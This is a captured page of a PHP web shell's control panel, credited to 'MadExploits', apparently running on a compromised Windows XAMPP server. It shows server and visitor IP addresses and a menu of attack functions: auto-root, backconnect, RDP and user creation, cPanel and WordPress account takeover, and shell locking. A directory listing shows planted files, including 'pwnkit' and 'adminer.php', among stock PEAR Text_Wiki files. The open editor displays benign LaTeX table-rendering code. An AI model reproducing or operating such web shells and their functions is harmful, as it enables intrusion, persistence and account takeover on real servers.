Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
pear /
Text /
Wiki /
Render /
Latex /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
Anchor.php
585
B
-rw-rw-rw-
Blockquote.php
738
B
-rw-rw-rw-
Bold.php
575
B
-rw-rw-rw-
Box.php
1.35
KB
-rw-rw-rw-
Break.php
435
B
-rw-rw-rw-
Center.php
714
B
-rw-rw-rw-
Code.php
511
B
-rw-rw-rw-
Colortext.php
1.11
KB
-rw-rw-rw-
Deflist.php
1.09
KB
-rw-rw-rw-
Delimiter.php
558
B
-rw-rw-rw-
Embed.php
451
B
-rw-rw-rw-
Emphasis.php
579
B
-rw-rw-rw-
Font.php
1.96
KB
-rw-rw-rw-
Freelink.php
171
B
-rw-rw-rw-
Function.php
442
B
-rw-rw-rw-
Heading.php
784
B
-rw-rw-rw-
Horiz.php
465
B
-rw-rw-rw-
Html.php
455
B
-rw-rw-rw-
Image.php
1.75
KB
-rw-rw-rw-
Include.php
130
B
-rw-rw-rw-
Interwiki.php
1.59
KB
-rw-rw-rw-
Italic.php
577
B
-rw-rw-rw-
List.php
2.2
KB
-rw-rw-rw-
Newline.php
157
B
-rw-rw-rw-
Page.php
1.22
KB
-rw-rw-rw-
Paragraph.php
596
B
-rw-rw-rw-
Phplookup.php
755
B
-rw-rw-rw-
Plugin.php
1.3
KB
-rw-rw-rw-
Prefilter.php
2.23
KB
-rw-rw-rw-
Preformatted.php
1.29
KB
-rw-rw-rw-
Raw.php
447
B
-rw-rw-rw-
Revise.php
776
B
-rw-rw-rw-
Smiley.php
1.26
KB
-rw-rw-rw-
Specialchar.php
1.64
KB
-rw-rw-rw-
Strong.php
582
B
-rw-rw-rw-
Subscript.php
1.35
KB
-rw-rw-rw-
Superscript.php
627
B
-rw-rw-rw-
Table.php
2.41
KB
-rw-rw-rw-
Tighten.php
131
B
-rw-rw-rw-
Titlebar.php
1.38
KB
-rw-rw-rw-
Toc.php
546
B
-rw-rw-rw-
Tt.php
578
B
-rw-rw-rw-
Underline.php
588
B
-rw-rw-rw-
Url.php
894
B
-rw-rw-rw-
Wikilink.php
1.66
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Table.php
<?php class Text_Wiki_Render_Latex_Table extends Text_Wiki_Render { var $cell_id = 0; var $cell_count = 0; var $is_spanning = false; var $conf = array( 'css_table' => null, 'css_tr' => null, 'css_th' => null, 'css_td' => null ); /** * * Renders a token into text matching the requested format. * * @access public * * @param array $options The "options" portion of the token (second * element). * * @return string The text rendered from the token options. * */ function token($options) { // make nice variable names (type, attr, span) extract($options); switch ($type) { case 'table_start': $this->cell_count = $cols; $tbl_start = '\begin{tabular}{|'; for ($a=0; $a < $this->cell_count; $a++) { $tbl_start .= 'l|'; } $tbl_start .= "}\n"; return $tbl_start; case 'table_end': return "\\hline\n\\end{tabular}\n"; case 'caption_start': return "\\caption{"; case 'caption_end': return "}\n"; case 'row_start': $this->is_spanning = false; $this->cell_id = 0; return "\\hline\n"; case 'row_end': return "\\\\\n"; case 'cell_start': if ($span > 1) { $col_spec = ''; if ($this->cell_id == 0) { $col_spec = '|'; } $col_spec .= 'l|'; $this->cell_id += $span; $this->is_spanning = true; return '\multicolumn{' . $span . '}{' . $col_spec . '}{'; } $this->cell_id += 1; return ''; case 'cell_end': $out = ''; if ($this->is_spanning) { $this->is_spanning = false; $out = '}'; } if ($this->cell_id != $this->cell_count) { $out .= ' & '; } return $out; default: return ''; } } } ?>
Close